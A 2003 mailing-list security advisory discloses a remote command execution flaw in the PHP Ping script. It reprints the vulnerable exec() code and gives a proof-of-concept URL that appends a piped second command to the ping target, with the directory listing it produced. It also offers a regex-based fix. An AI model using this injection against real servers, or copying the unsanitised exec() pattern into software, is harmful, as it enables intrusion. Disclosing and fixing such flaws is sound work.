[VulnWatch] [SCSA-009] Remote Command Execution Vulnerability in PHP Ping

From: Gregory Le Bras | Security Corporation (gregory.lebras@security-corp.org)
Date: 03/06/03

  • Next message: Frog Man: "[VulnWatch] PHP-Nuke 6.0 (& 6.5?) : Serious SQL Injection Security Holes"
    From: "Gregory Le Bras | Security Corporation" <gregory.lebras@security-corp.org>
    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 6 Mar 2003 12:57:26 +0100
    
    

    ________________________________________________________________________

    Security Corporation Security Advisory [SCSA-009]
    ________________________________________________________________________

    PROGRAM: PHP Ping
    HOMEPAGE: http://www.phpapps.org/
    VULNERABLE VERSIONS: v0.1 and prior
    ________________________________________________________________________

    DESCRIPTION
    ________________________________________________________________________

    PHP ping "will allow you, provided that your server turns under Windows,
    to realize a "ping" on the host of your choice."

    (direct quote from PHP Ping website)

    DETAILS
    ________________________________________________________________________

    A vulnerability have been found in PHP ping which allow attackers to
    execute remote command.

    This vulnerability would allow a remote attacker to compromise parts of
    the operating system, possibly the complete operating system.

    Vulnerable code :

    <?
    //*************************************
    // FONCTION DU PING
    //*************************************
    function PHPing($cible,$pingFile){
    exec("ping -a -n 1 $cible >$pingFile", $list);
    $fd = fopen($pingFile, "r");
    while(!feof($fd))
    {
    $ping.= fgets($fd,256);
    }
    fclose($fd);
    return $ping;
    }
    //-------------------------------------
    ?>

    EXPLOIT
    ________________________________________________________________________

    The vulnerability was discovered in the page for execute "ping",
    at this adress :

    http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

    This exploit simply show the contents of the current repertory.

    c:\phpping

    03/03/2003 23:01 <DIR> .
    03/03/2003 23:01 <DIR> ..
    03/03/2003 23:00 <DIR> img
    30/04/2002 23:13 3217 index.php
    30/04/2002 23:19 921 README
    03/03/2003 23:03 0 resultat.ping
                   3 file(s) 4138 bytes
                   3 Dir(s) 11413962752 bytes free

    SOLUTIONS
    ________________________________________________________________________

    For example use this code :

    <?
    //*************************************
    // FONCTION DU PING
    //*************************************
    function PHPing($cible,$pingFile){

    # BugFix by Gregory LEBRAS www.security-corp.org

    if( (!$cible) ||
    (!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
      echo("Error: Please specify a valid target host or IP.");
      exit;
    }
    else
    {
    exec("ping -a -n 1 $cible >$pingFile", $list);
    $fd = fopen($pingFile, "r");
    while(!feof($fd))
    {
    $ping.= fgets($fd,256);
    }
    fclose($fd);
    return $ping;
    }
    }
    //------------------------------------

    VENDOR STATUS
    ________________________________________________________________________

    The vendor has reportedly been notified.

    LINKS
    ________________________________________________________________________

    Version Française :

    http://www.security-corp.org/advisories/SCSA-009-FR.txt

    ------------------------------------------------------------
    Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
    ------------------------------------------------------------


  • Next message: Frog Man: "[VulnWatch] PHP-Nuke 6.0 (& 6.5?) : Serious SQL Injection Security Holes"

    Relevant Pages